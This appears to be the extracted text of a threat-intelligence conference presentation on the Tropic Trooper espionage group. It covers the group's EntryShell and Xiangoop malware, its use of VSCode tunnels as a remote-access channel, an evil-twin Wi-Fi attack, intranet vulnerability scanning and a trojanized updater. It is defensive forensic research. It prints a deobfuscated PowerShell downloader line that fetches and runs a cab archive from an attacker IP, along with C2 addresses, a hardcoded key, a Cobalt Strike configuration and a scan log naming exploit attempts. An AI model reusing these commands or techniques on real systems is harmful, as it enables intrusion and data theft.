###### ITOCHU Cyber & Intelligence inc. # Pirates of The Nang Hai: ## Follow the Artifacts No One Knows ----- ## Who are we? ###### Yusuke Suguru Niwa Ishimaru Lead Cybersecurity Researcher Sr. Cybersecurity Researcher VB2023, Botconf, JSAC etc. HITCON 2021, 2019, 2017 and 2016 Company: ITOCHU Cyber & Intelligence Inc. ----- ## Special Thanks to team members ###### Motohiko Sato Shuhei Sasada Yasuhiro Takeda X: @58_158_177_102 X: @sugimu_sec X: @ytakeda_sec Company: ITOCHU Cyber & Intelligence Inc. ----- |M|otivatio| |---|---| |As a RA|T| |---|---| ### Agenda ###### Motivation Who is Tropic Trooper? EntryShell Xiangoop Loader Disclosing Uncommon Attack Methods VSCode As a RAT EvilTwin Attack Exploiting Domestic Electronic Seal System NEW Update process of a well-known app NEW Conclusions ----- ### Motivation ----- ### Motivation ###### Reminiscent of a Spy Movie We observed three uncommon attack methods utilized by TropicTrooper. However, they occurred in the wild. Challenges in Identification: These sophisticated intrusion and compromise techniques are extremely difficult to identify. They require expert skills and a significant amount of time. Need for Flexibility for Investigation! It is crucial to avoid fixed notions based on traditional attack methods. We’ll provide approach investigations with flexibility and insight. ----- ### Who is Tropic Trooper? ----- ### Who is Tropic Trooper? ### Who is Tropic Trooper? ###### Tropic Trooper (a.k.a Pirate Panda, Keyboy and APT23 ) first drew the world’s attention with the name KeyBoy in 2013. This group shows great enthusiasm in Asia-Pacific regions, have long been targeting government and military Identified to Tropic Trooper based on some specific Target Areas Taiwan Vietnam India CobaltStrike Beacon + Watermark 520 Australia Philippines Thailand ``` https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf https://citizenlab.ca/2016/11/parliament-keyboy/ https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2022.pdf ``` ### Who is Tropic Trooper? ###### Tropic Trooper (a.k.a Pirate Panda, Keyboy and APT23 ) first drew the world’s attention with the name KeyBoy in 2013. This group shows great enthusiasm in Asia-Pacific regions, have long been targeting government and military units. Identified to Tropic Trooper based on some specific malware families: ◼ KeyBoy ◼ EntryShell ◼ CobaltStrike Beacon + Watermark 520 ◼ Xiangoop ``` https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf https://citizenlab.ca/2016/11/parliament-keyboy/ ``` ----- ###### EntryShell is a variant of KeyBoy. It is a fileless RAT with some commands such as Sysinfo, Download, Shell and so on. The DLL has only one malicious Export function ‘DllEntry’ EntryShell updates ◼ String obfuscation ◼ Malware Configuration ◼ Backdoor commands We named from the export and a command to ◼ C2 communications ◼ Junk codes ##### (Dll)Entry + Shell -> EntryShell ----- ###### Several distinctive strings are hardcoded within EntryShell. These strings are the same with KeyBoy. Also Code/features are almost the same. ----- ###### Encrypted data Decrypted strings login_OK Update UpdateAndRun Refresh OnLine Disconnect Pw_Error Pw_OK Ctrl_End Sysinfo Download UploadFileOk Ascii2bin RemoteRun Computer + Shell AES 128 ECB ChangeCfg ----- ###### The malware configuration is hard-coded internally and designed to be decrypted and utilized upon infection. v_enc_mod = (v_enc & (1 << (7 - n_count))) != 0; result = v_enc_mod + 2 * v_enc_next; v_enc_next = v_enc_mod + 2 * v_enc_next; Check Code = 0123456789 Port Number #1 = 4431 Proxy = 0 C2 address #1 Port Number #2 = 0 Proxy Port = 0 (85[.]209[.]43[.]142) Port Number #3 = 0 Proxy User = 0 C2 address #2 = 0 PIN for C2 Operation = 1003 Proxy Password = 0 ----- ###### Another unique malware Xiangoop was observed as a loader/downloader of payload such as EntryShell, CobaltStrike Beacon. We also discovered an artifact with a PDB file by the attacker’s mistake. Two specific words are taken from the folder name of the developer’s env, and combination to generate this malware name. ##### xiang(mu) + goop(date.dll) -> Xiangoop ----- |[ variant AJ ] Mar 06 08:49:58 Format: PE x64 (D Filename: McVsoC Export: McVsoCfgGetObj BLOB: setting.dat|2023 LL) fg.dll ect| |---|---| ###### [ variant AwDJ] [ variant SxJC ] Sep 25 06:13:34 2023 Jun 15 07:14:39 2023 Format: PE x64 (DLL) Format: PE x64 (EXE) [ variant AwMJ ] Filename: McVsoCfg.dll Filename: AdobeFlash.exe Aug 18 08:14:29 2023 [ variant AJ ] Export: BLOB: Format: PE x64 (DLL) Mar 06 08:49:58 2023 McVsoCfgGetObject Filename: McVsoCfg.dll Format: PE x64 (DLL) Next: /qwja…no.php Export: Filename: McVsoCfg.dll McVsoCfgGetObject Export: BLOB: setting.dat McVsoCfgGetObject BLOB: setting.dat [ variant AwDC] [ variant AM ] Mar 26 09:18:40 2024 [ variant SxI ] Aug 09 08:27:38 2023 [ variant AwD] [ variant A ] May 23 06:37:26 2023 Format: PE x64 (DLL) Sep 22 02:56:52 2023 Format: PE x64 (DLL) Nov 03 03:12:29 2022 Format: PE x64 (DLL) Filename: McVsoCfg.dll Format: PE x64 (DLL) Filename: McVsoCfg.dll Format: PE x32 (DLL) Filename: McVsoCfg.dll Export: Filename: McVsoCfg.dll Export: McVsoCfgGetObject Filename: goopdate.dll Export: McVsoCfgGetObject Export: Next: /qwja…no.php Export: DllEntry McVsoCfgGetObject BLOB: setting.dat McVsoCfgGetObject BLOB: BLOB: setting.dat Next: /qwja…no.php 2022 2023 2024 Collected 200+ samples between 2022 and 2024 ----- ###### Xiangoop A is a simple loader for payload in memory Using DLL side loading AES ECB mode hardcoded key = "123456AAAAAAAAAA” googleupdate.exe legitimate EXE side-load EntryShell decrypt goopdate.dll Xiangoop read base.jpg ----- ###### Xiangoop Loader AJ is almost the same as the variant A A simple loader using AES ECB mode with hardcoded key "123456AAAAAAAAAA“ Difference is the HUGE Junk code Avira.exe legitimate EXE side-load Cobalt Strike Beacon decrypt McVsoCfg.dll Xiangoop read BLOB ----- |+ Control flow flattering|Col2|Col3| |---|---|---| | payload||| ||ry>|| ###### Salsa20 to decrypt payload from BLOB x25519 + hsalsa20 + hsalsa20 to generate crypto key Poly-1305 to calculate check value for success of key generation huge Junk code + Control flow flattering read AdobeFlash.exe dropper payload decrypt BLOB ----- ### Disclosing Uncommon Attack Methods ----- ###### Initial Infection Vectors Post Exploitation unrecognized RAM Spear-phishing Xiangoop Cobalt Strike Email or SMS Loader Beacon or VSCode EntryShell Xiangoop Cobalt Strike Beacon Physical penetration Stolen Loader or EntryShell with WiFi AP Credential Exploit Domestic Well-known Electronic Seal System ----- ###### 1. VSCode As a RAT 2. EvilTwin Attack 3. Exploiting Domestic Electronic Seal System 4. Update of a well-known app Exploit Domestic Electronic Seal System ----- ###### 1. VSCode As a RAT 2. EvilTwin Attack 3. Exploiting Domestic Electronic Seal System 4. Update of a well-known app ----- ### Case1 VSCode as a RAT Attack Overview ###### Operation VSCode has a remote Communication Tropic Trooper C2 Server tunneling feature. Operation BLOB By using this, victim host Side-Load is remotely controlled by Downloader the attacker. Microsoft Server RAT Install Pretty difficult to filter Legitimate out by FW, because the Tunnel source is Microsoft. VSCode CLI VSCode Server ----- ### Case1 About the super timeline ###### It is important to create a super timeline by linking together the recorded events from various artifacts. Example Artifacts ◼ MFT Record ◼ USN Journal ◼ Windows Event Log ◼ ShimCache ◼ Prefetch ◼ SRUM ◼ FireWall Logs ◼ Registry etc. ----- |Time (UTC+8)|Action|Path|Col4|Col5|Filename|Artifact| |---|---|---|---|---|---|---| |2023/9/23 10:33:32|File Creation|C:¥Users¥¥Desktop|||中秋节礼盒清单.iso|MFT| |2023/9/23 10:33:47|File Creation|C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent|||海神星礼盒A款.png.lnk|MFT| |2023/9/24 19:45:18|File Creation|C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent|||中秋节礼盒清单.iso.lnk|MFT| |2023/9/24 19:45:22|File Execution|E:/|||卡券和礼盒清单.exe|Registry| |2023/9/24 19:56:34|File Creation|C:¥Users¥Public¥Music|||msoev.exe|MFT| |2023/9/24 20:00:35|File Creation|C:¥Users¥Public¥Music|||mosev.exe|MFT| |2023/9/25 13:26:32|File Creation|C:¥Users¥Public¥Music|||McVsoCfg.dll|MFT| |2023/9/25 13:29:11|File Creation|C:¥Users¥Public¥Music|||a.ini|MFT| |2023/9/25 13:31:35|Directory Creation|D Drive|||winows10|UsnJrnl| |2023/9/25 13:33:27|File Creation|① File Download and Execution D Drive|||McVsoCfg.dll|UsnJrnl| |2023/9/25 13:33:47|File Creation|D Drive|||Desktop.ini|UsnJrnl| |2023/9/25 13:34:09|File Creation|D Drive|||mosev.exe|UsnJrnl| |2023/9/25 13:41:40|File Creation|C:¥Intel¥Profiles|||code.exe|MFT| |2023/9/25 13:41:59|File Creation|C:¥Intel¥Profiles ② What is VSCode !?|||runtime.exe|MFT| |2023/9/25 13:41:59|Suspect File Execution|c:¥Intel¥Profiles|||runtime.exe|Shimcache| |2023/9/25 13:44:19|Directory Creation|C:¥Users¥|||VSCODE~1|MFT| |2023/9/25 13:44:19|File Creation|c:¥Users¥¥.vscode¥cli|||tunnel-stable.lock|MFT| |2023/9/25 13:48:57|Suspect File Execution|c:¥Users¥¥.vscode¥cli¥servers¥Stable- ¥server¥node_modules¥@vscode¥ripgrep¥bin|||rg.exe|Shimcache| |2023/9/25 13:48:55|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server|||node.exe|Shimcache| |2023/9/25 13:48:55|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥¥server|||node.exe|Shimcache| |2023/9/25 13:49:01|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node- vsce-sign¥bin|||vsce-sign.exe|Shimcache| |2023/9/25 13:49:05|File Creation|c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥cont rib¥terminal¥browser¥media|||shellIntegration.ps1|MFT| |2023/9/25 13:55:35|Directory Creation|C:¥Users¥¥AppData¥Local¥Temp|||.tmp7DIT16|MFT| |2023/9/25 13:55:35|File Creation|C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16|||vscode_cli_win32_x64_cli.zip|MFT| |2023/9/25 13:55:36|Directory Creation|C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16|||content|MFT| |2023/9/25 13:55:36|File Creation|C:¥User|s¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content|code.exe|MFT| |2023/9/25 13:56:37|File Creation|C:¥User|s¥¥.vscode-server¥data¥logs¥20230925T134907|ptyhost.log|MFT| |2023/9/25 13:56:39|Directory Creation|C:¥User|s¥¥AppData¥Local¥Microsoft¥Windows|d ③ PowerShell|MFT| |2023/9/25 13:56:53|File Creation|C:¥Users¥¥AppData¥Local¥Microsoft¥Windows¥PowerShell|||ModuleAnalysisCache|MFT| |2023/9/25 13:56:55|Directory Creation|C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows|||PowerShell|MFT| |2023/9/25 13:56:55|Directory Creation|C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell|||PSReadLine|MFT| |2023/9/25 13:56:55|File Creation|C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell¥PSReadLine|||ConsoleHost_history.txt|MFT| #### Case1 Create a super timeline for compromised host ``` Time (UTC+8) Action Path Filename Artifact ``` `2023/9/23 10:33:32` `File Creation` `C:¥Users¥¥Desktop` 中秋节礼盒清单.iso `MFT` `2023/9/23 10:33:47` `File Creation` `C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent` 海神星礼盒A款.png.lnk `MFT` `2023/9/24 19:45:18` `File Creation` `C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥Recent` 中秋节礼盒清单.iso.lnk `MFT` `2023/9/24 19:45:22` `File Execution` `E:/` 卡券和礼盒清单.exe `Registry` ``` 2023/9/24 19:56:34 File Creation C:¥Users¥Public¥Music msoev.exe MFT 2023/9/24 20:00:35 File Creation C:¥Users¥Public¥Music mosev.exe MFT 2023/9/25 13:26:32 File Creation C:¥Users¥Public¥Music McVsoCfg.dll MFT 2023/9/25 13:29:11 File Creation C:¥Users¥Public¥Music a.ini MFT 2023/9/25 13:31:35 Directory Creation D Drive winows10 UsnJrnl 2023/9/25 13:33:27 File Creation D Drive McVsoCfg.dll UsnJrnl ###### ① File Download and Execution 2023/9/25 13:33:47 File Creation D Drive Desktop.ini UsnJrnl 2023/9/25 13:34:09 File Creation D Drive mosev.exe UsnJrnl 2023/9/25 13:41:40 File Creation C:¥Intel¥Profiles code.exe MFT 2023/9/25 13:41:59 File Creation C:¥Intel¥Profiles runtime.exe MFT ``` `2023/9/25 13:41:59` `Suspect File Execution c:¥Intel¥Profiles` **② What is VSCode !?** `runtime.exe` `Shimcache` ``` 2023/9/25 13:44:19 Directory Creation C:¥Users¥ VSCODE~1 MFT 2023/9/25 13:44:19 File Creation c:¥Users¥¥.vscode¥cli tunnel-stable.lock MFT c:¥Users¥¥.vscode¥cli¥servers¥Stable- 2023/9/25 13:48:57 Suspect File Execution ¥server¥node_modules¥@vscode¥ripgrep¥bin rg.exe Shimcache 2023/9/25 13:48:55 Suspect File Execution C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server node.exe Shimcache 2023/9/25 13:48:55 Suspect File Execution C:¥Users¥¥.vscode¥cli¥servers¥¥server node.exe Shimcache C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node- 2023/9/25 13:49:01 Suspect File Execution vsce-sign¥bin vsce-sign.exe Shimcache c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥cont 2023/9/25 13:49:05 File Creation rib¥terminal¥browser¥media shellIntegration.ps1 MFT 2023/9/25 13:55:35 Directory Creation C:¥Users¥¥AppData¥Local¥Temp .tmp7DIT16 MFT 2023/9/25 13:55:35 File Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 vscode_cli_win32_x64_cli.zip MFT 2023/9/25 13:55:36 Directory Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 content MFT 2023/9/25 13:55:36 File Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content code.exe MFT ``` `2023/9/25 13:56:372023/9/25 13:56:39` `Directory CreationFile Creation` `C:¥Users¥¥AppData¥Local¥Microsoft¥Windowsd>¥.vscode-server¥data¥logs¥20230925T134907Explore the links between ②` **andptPowerShell ③yhost.log** `MFTMFT` ``` 2023/9/25 13:56:53 File Creation C:¥Users¥¥AppData¥Local¥Microsoft¥Windows¥PowerShell ModuleAnalysisCache MFT 2023/9/25 13:56:55 Directory Creation C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows PowerShell MFT 2023/9/25 13:56:55 Directory Creation C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell PSReadLine MFT 2023/9/25 13:56:55 File Creation C:¥Users¥¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell¥PSReadLine ConsoleHost_history.txt MFT ``` ----- |Windows PowerShell Commands History Log|%USERPROFILE%¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell ¥PSReadLine¥ConsoleHost_history.txt| |---|---| |Windows Event Log|Windows Eventlog(Windows PowerShell.evtx Microsoft-Windows-Powershell%4Operational.evtx| #### Case1 Explore the PowerShell logs to verify the links ###### Major Artifacts of PowerShell Execution ``` %USERPROFILE%¥AppData¥Roaming¥Microsoft¥Windows¥PowerShell Windows PowerShell Commands History Log ¥PSReadLine¥ConsoleHost_history.txt Windows Eventlog(Windows PowerShell.evtx Windows Event Log Microsoft-Windows-Powershell%4Operational.evtx The PowerShell execution was likely triggered by VSCode! ``` ----- |VSCode itself ② What is VSCode !?|Col2|Col3|Col4|Col5| |---|---|---|---|---| |||||| |Time (UTC+8)|Action|Path|Filename|Artifact| |2023/9/25 13:41:40|File Creation|C:¥Intel¥Profiles|code.exe|MFT| |2023/9/25 13:41:59|File Creation|C:¥Intel¥Profiles|runtime.exe|MFT| |2023/9/25 13:41:59|Suspect File Execution|c:¥Intel¥Profiles|runtime.exe|Shimcache| |2023/9/25 13:44:18|File Creation|C:¥Intel¥Profiles Tunnel was established|tmp|MFT| |2023/9/25 13:44:19|Directory Creation|C:¥Users¥|VSCODE~1|MFT| |2023/9/25 13:44:19|File Creation|c:¥Users¥¥.vscode¥cli|tunnel-stable.lock|MFT| |2023/9/25 13:48:57|Suspect File Execution|c:¥Users¥¥.vscode¥cli¥servers¥Stable- ¥server¥node_modules¥@vscode¥ripgrep¥bin|rg.exe|Shimcache| |2023/9/25 13:48:55|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server|node.exe|Shimcache| |2023/9/25 13:48:55|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥¥server|node.exe|Shimcache| |2023/9/25 13:49:01|Suspect File Execution|C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node- vsce-sign¥bin|vsce-sign.exe|Shimcache| |2023/9/25 13:49:05|File Creation|c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥cont rib¥terminal¥browser¥media|shellIntegration.ps1|MFT| |2023/9/25 13:55:35|Directory Creation|C:¥Users¥¥AppData¥Local¥Temp|.tmp7DIT16|MFT| |2023/9/25 13:55:35|File Creation|C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16|vscode_cli_win32_x64_cli.zip|MFT| |2023/9/25 13:55:36|Directory Creation|C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16|content|MFT| |2023/9/25 13:55:36|File Creation|C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content|code.exe|MFT| |2023/9/25 13:56:37|File Creation|C:¥Users¥¥.vscode-server¥data¥logs¥20230925T134907|ptyhost.log|MFT| |2023/9/25 13:56:39|Powershell Execution|C:¥WINDOWS¥System32¥WindowsPowerShell¥v1.0¥powershell.exe -noexit -command try { . "c:¥Users¥¥.vscode¥cli¥servers¥Stable- abd2f3db4bdb28f9e95536dfa84d8479f1eb312d¥server¥out¥vs¥workbench¥contrib¥termin al¥browser¥media¥shellIntegration.ps1" } catch {}|-|Windows Event Log| ### Case1 Deep-dive VSCode activity ###### VSCode itself ② What is VSCode !? ``` Time (UTC+8) Action Path Filename Artifact 2023/9/25 13:41:40 File Creation C:¥Intel¥Profiles code.exe MFT 2023/9/25 13:41:59 File Creation C:¥Intel¥Profiles runtime.exe MFT 2023/9/25 13:41:59 Suspect File Execution c:¥Intel¥Profiles runtime.exe Shimcache ``` `2023/9/25 13:44:18` `File Creation` `C:¥Intel¥Profiles` Tunnel was established `tmp` `MFT` ``` 2023/9/25 13:44:19 Directory Creation C:¥Users¥ VSCODE~1 MFT 2023/9/25 13:44:19 File Creation c:¥Users¥¥.vscode¥cli tunnel-stable.lock MFT c:¥Users¥¥.vscode¥cli¥servers¥Stable- 2023/9/25 13:48:57 Suspect File Execution ¥server¥node_modules¥@vscode¥ripgrep¥bin rg.exe Shimcache 2023/9/25 13:48:55 Suspect File Execution C:¥Users¥¥.vscode¥cli¥servers¥.staging¥server node.exe Shimcache 2023/9/25 13:48:55 Suspect File Execution C:¥Users¥¥.vscode¥cli¥servers¥¥server node.exe Shimcache C:¥Users¥¥.vscode¥cli¥servers¥¥server¥node_modules¥node- 2023/9/25 13:49:01 Suspect File Execution vsce-sign¥bin vsce-sign.exe Shimcache c:¥Users¥¥.vscode¥cli¥servers¥¥server¥out¥vs¥workbench¥cont 2023/9/25 13:49:05 File Creation rib¥terminal¥browser¥media shellIntegration.ps1 MFT 2023/9/25 13:55:35 Directory Creation C:¥Users¥¥AppData¥Local¥Temp .tmp7DIT16 MFT 2023/9/25 13:55:35 File Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 vscode_cli_win32_x64_cli.zip MFT 2023/9/25 13:55:36 Directory Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16 content MFT 2023/9/25 13:55:36 File Creation C:¥Users¥¥AppData¥Local¥Temp¥.tmp7DIT16¥content code.exe MFT 2023/9/25 13:56:37 File Creation C:¥Users¥¥.vscode-server¥data¥logs¥20230925T134907 ptyhost.log MFT C:¥WINDOWS¥System32¥WindowsPowerShell¥v1.0¥powershell.exe -noexit -command try { . "c:¥Users¥¥.vscode¥cli¥servers¥Stable- Windows 2023/9/25 13:56:39 Powershell Execution - abd2f3db4bdb28f9e95536dfa84d8479f1eb312d¥server¥out¥vs¥workbench¥contrib¥termin Event Log al¥browser¥media¥shellIntegration.ps1" } catch {} ###### Launching Terminal Finally, this timeline proves that after the malware infection, the attacker used the VSCode terminal to run PowerShell. ``` ----- ### Case1 Catch the attacker’s commands ###### ◼ We found out an artifact which reveals commands used to understand the actor’s operation ◼ Interestingly, the actor got Wi-Fi access point information via the VSCode tunnel ----- ###### 1. VSCode As a RAT 2. EvilTwin Attack 3. Exploiting Domestic Electronic Seal System 4. Update of a well-known app ----- ### Case2 EvilTwin Attack Overview ###### ◼ Attacker physically intrude and secretly set up a Wi-Fi access point with a SSID spoofed target organization name. ◼ They could get credentials, when a targeted employee connect to the Wi-Fi and input password. ◼ The attacker came physically again to set up their PC and access the target Wi-Fi using the stolen credential. ◼ Interestingly, a CobaltStrike was installed in the PC. 3. Victim to 1. Look for 2. Set up 4. Steal 5. Set up a PC connect a the site a rogue Wi-Fi Credential under the Wi-Fi rogue Wi-Fi Rogue Wi-Fi Rogue SSID Legitimate Attacker’s PC Credential with CobaltStrike ----- ### Case2 How to find this attack method ###### ◼ An admin login failure alert on the AD server revealed a suspicious IP within the branch's wireless LAN range using a non- standard host name. ◼ In Case 1, the attacker also attempted to steal the Wi-Fi password, indicating an intention for continuous physical intrusions. ◼ Just before the unauthorized access, a suspicious SSID appeared in the target office building. ----- ##### Why targeting to the Wi-Fi? ###### ◼ They have a high risk in physical intrusions ◼ When the attacker connects to a Wi-Fi AP, they can access to intranet directly The attacker crosses the boundary between physical and cyber spaces to achieve their goals! ----- ###### 1. VSCode As a RAT 2. EvilTwin Attack 3. Exploiting Domestic Electronic Seal System 4. Update of a well-known app Exploit Domestic Electronic Seal System ----- ###### Have you seen something A web app of domestic like this before? electronic seal system ----- ### Case3 Scanning Domestic Electronic Seal System ###### ◼ Following the intrusion in Case 2, Case 3 occurred. The attacker’s PC connected via the office's Wi-Fi ◼ The attacker control the PC via CobaltStrike, and vulnerability scan the domestic electronic seal web server Office Wi-Fi Attacker Vulnerability scanning Attacker’s PC Web server Installed CobaltStrike in intranet Domestic electronic seal system ----- ``` Time Source address Destination address URL/Filename Threat/Content Name 2023/7/27 15:43 Attacker’s PC 103.234.54[.]128 103.234.54[.]128/ CobaltStrike.Gen Command and Control Traffic(12067) Anmei Digital Hotel Broadband OS Remote Command Injection 2023/7/27 15:54 Attacker’s PC Web System server_ping.php Vulnerability(92963) 2023/7/27 15:55 Attacker’s PC Web System validate.jsp HTTP SQL Injection Attempt(58005) 2023/7/27 15:55 Attacker’s PC Web System WorkflowServiceXml Weaver E-cology OA System Remote Code Execution Vulnerability(93415) 2023/7/27 15:55 Attacker’s PC Web System user.php ECShop SQL Injection Vulnerability(93140) 2023/7/27 15:55 Attacker’s PC Web System delete_cart_goods.php HTTP SQL Injection Attempt(54608) 2023/7/27 15:55 Attacker’s PC Web System plugin HTTP Directory Traversal Request Attempt(30844) 2023/7/27 15:55 Attacker’s PC Web System passwd HTTP /etc/passwd Access Attempt(35107) 2023/7/27 15:55 Attacker’s PC Web System login Inspur ClusterEngine Command Injection Vulnerability(90789) 2023/7/27 15:55 Attacker’s PC Web System showOrDownByurl.do HTTP Directory Traversal Request Attempt(30844) 2023/7/27 15:55 Attacker’s PC Web System createTokenByPassword Jenkins Exposure of Sensitive Information Vulnerability(55171) Atlassian Jira Server and Data Center ViewUserHover.jspa Information 2023/7/27 15:55 Attacker’s PC Web System ViewUserHover.jspa Disclosure Vulnerability(93347) 2023/7/27 15:55 Attacker’s PC Web System index.php HTTP SQL Injection Attempt(54608) 2023/7/27 15:55 Attacker’s PC Web System downfile.php Microsoft Windows win.ini Access Attempt Detected(30851) 2023/7/27 15:55 Attacker’s PC Web System config.properties Ffay Lanproxy Directory Traversal Vulnerability(90235) ###### Why the attacker targeted the system? 2023/7/27 15:56 Attacker’s PC Web System jkstatus; Apache Web Server Access Control Bypass Vulnerability(54785) 2023/7/27 15:56 Attacker’s PC Web System index.php Apache Tomcat Remote Code Execution Via JSP Upload Vulnerability(38761) 1) and (select 1 from (select 2023/7/27 15:56 Attacker’s PC• To get any info from the unique system Web System HTTP SQL Injection Attempt(93331) count(*),concat(0x716b627671,(sel 2023/7/27 15:56 Attacker’s PC Web System fileList ThinkPHP Arbitrary File Write Vulnerability(57622) • Just scan for a web server in intranetVMware Server-Side Template Injection Remote Code Execution 2023/7/27 16:35 Attacker’s PC Web System verify Vulnerability(92483) 2023/7/27 16:35 Attacker’s PC Web System hedwig.cgi D-Link Remote Code Execution Vulnerability(57934) octet-stream......-- 2023/7/27 16:35 Attacker’s PC Web System win.ini Microsoft Windows win.ini Access Attempt Detected(30851) 2023/7/27 16:35 Attacker’s PC Web System Web System/node/?_format=hal_json Drupal core Remote Code Execution Vulnerability(55385) 2023/7/27 16:35 Attacker’s PC Web System WorkflowServiceXml Weaver E-cology OA System Remote Code Execution Vulnerability(93415) 2023/7/27 16:35 Attacker’s PC Web System getdata.jsp Weaver OA8 SQL Injection Vulnerability(91183) 2023/7/27 16:35 Attacker’s PC Web System SyncUserInfo.jsp HTTP SQL Injection Attempt(35823) 2023/7/27 16:35 Attacker’s PC Web System WorkflowCenterTreeData.jsp Drupal Core Remote Code Execution Vulnerability(40627) 35 ``` ----- ###### 1. VSCode As a RAT 2. EvilTwin Attack 3. Exploiting Domestic Electronic Seal System 4. Update of a well-known app ----- ### Case4 CobaltStrike Beacon was detected ###### ◼ In early May 2024, we got some alerts regarding process injection with CobaltStrike Beacon. ◼ With the sudden appearance of the malware, the initial vector is unknown. 2024/5/2 2024/5/4 2024/5/4 2024/5/6 154.90.62[.]210 154.90.62[.]210 154.90.62[.]210 45.32.117[.]177 5/2 11:53:00 - CobaltStrike CobaltStrike CobaltStrike 5/6 19:07:00 Beacon Beacon Beacon Infected Host WeChatAppEx.exe McAfeeManager.exe AdobeARM.exe AdobeARM.exe ----- ### Case4 Find suspicious points ###### Dive into the timeline of the past month or so. As a result, two suspicious events were identified based on the common characteristics of creating suspicious files under the Public folder and using files with the .cab extension, which were also used in past attack campaigns. ----- ### Case4 Any suspicious points? ##### Before several seconds, suspicious files are found ###### ◼ script.js ◼ YoudaoDictUpt.exe ----- ### Case4 Datetime, Size, Hash are useful ##### Aren't these files unusually small in size for some reason? ###### MD5: 16a37c7c2f8b7310ee8ef2dcd33af39b The hash values of both files are the same *Nothing in Virustotal.com ----- |ser|ver| |---|---| ###### A downloader disguised as a YoudaoDict updater. It retrieves a .js file from the C2 server and executes the JS via Wscript. script.js(1.js) ----- ###### ◼ script.js is obfuscated. ◼ De-obfuscated script shows that it downloads an archive ”test.cab” from a C2 sand save it in a specific file path. ◼ Then, the script extracts the cab file and executes a McAfeeManager.exe to load next Downloader3 ``` Deobfuscate Script Result(Partial excerpt): powershell.exe" -ExecutionPolicy Bypass -Command "$url = 'hxxp://39.101.207[.]15/test.cab'; $outputPath = 'C:¥Users¥Public¥Music¥2.cab'; $extractPath = 'C:¥Users¥Public¥Music¥'; Invoke-WebRequest -Uri $url -OutFile script.js(1.js) $outputPath; Expand -F:* $outputPath $extractPath; Start- (Downloader) Process -FilePath 'C:¥Users¥Public¥Music¥McAfeeManager.exe'" side-load 2.cab McAfeeManager.exe McVsoCfg.dll (test.cab) legitimate EXE Downloader3 Archive ``` ----- ### Case4 Identified the Initial Infection Vector ###### ◼ The updater file was the source of infection ◼ The script.js and cab files are also malicious Date 2024/3/25 2024/4/13 Youdao Infra 45.32.117[.]177 39.101.207[.]15 Target Host YoudaoDict.exe YoudaoDictUpt.exe script.js(1.js) 1.cab YoudaoDictUpt.exe script.js(1.js) 2.cab (Downloader1) (Downloader2) (Malware Set) (Downloader1) (Downloader2) (Malware Set) C:¥Users¥¥ C:¥Users¥Public¥Music¥ C:¥Users¥ C:¥Users¥Public¥Music¥ ----- |ll 3|aunch the downloaded shellcode| |---|---| |L|aunch the downloaded shellcode| ||| ###### This dll file is Downloader and the code was obfuscated by CFF. It downloads an shellcode from the hardcoded C2 and launch it in memory. side-load 2.cab McAfeeManager.exe McVsoCfg.dll (test.cab) legitimate EXE Downloader3 Archive Xiangoop ##### Launch the downloaded shellcode ----- ###### The shellcode contains another PE which is also downloader. The PE sends the victim’s env such as language ID, hostname and username to C2 for filtering not actual target. Then it deliver the next encrypted payload, if it is their targets. The decryption is AES using Windows API with the hardcoded key. ----- ###### Extracted malware configuration of the CobaltStrike Beacon ``` BeaconType - HTTPS Port - 50000 SleepTime - 3000 MaxGetSize - 2099252 Jitter - 45 MaxDNS - Not Found PublicKey_MD5 - 5d31cda8059a60086c394d0e51f7a178 C2Server - 154.90.62[.]210,/Originate/contacts/CX4YJ5JI7RZ UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 HttpPostUri - /Divide/developement/GIZWQVCLF Malleable_C2_Instructions - Remove 910 bytes from the end Remove 1182 bytes from the beginning NetBIOS decode 'a' XOR mask w/ random key ……skipped…… Watermark - 520 ……skipped…… ``` ----- ###### ◼ This scheme connected to the C2 server 5 times. The actor could filter out the non-target connection, and did not provide next artifacts. ◼ The infection vector was an updater of wellknown-app. ◼ A variant of Xiangoop was discovered and the payload was CobaltStrike Beacon ----- ### Conclusions ----- ###### ◼ Tropic Trooper is still very active in 2024 to targeting material industries ◼ They actively trying unconventional intrusion and new methods, unconcerned with the 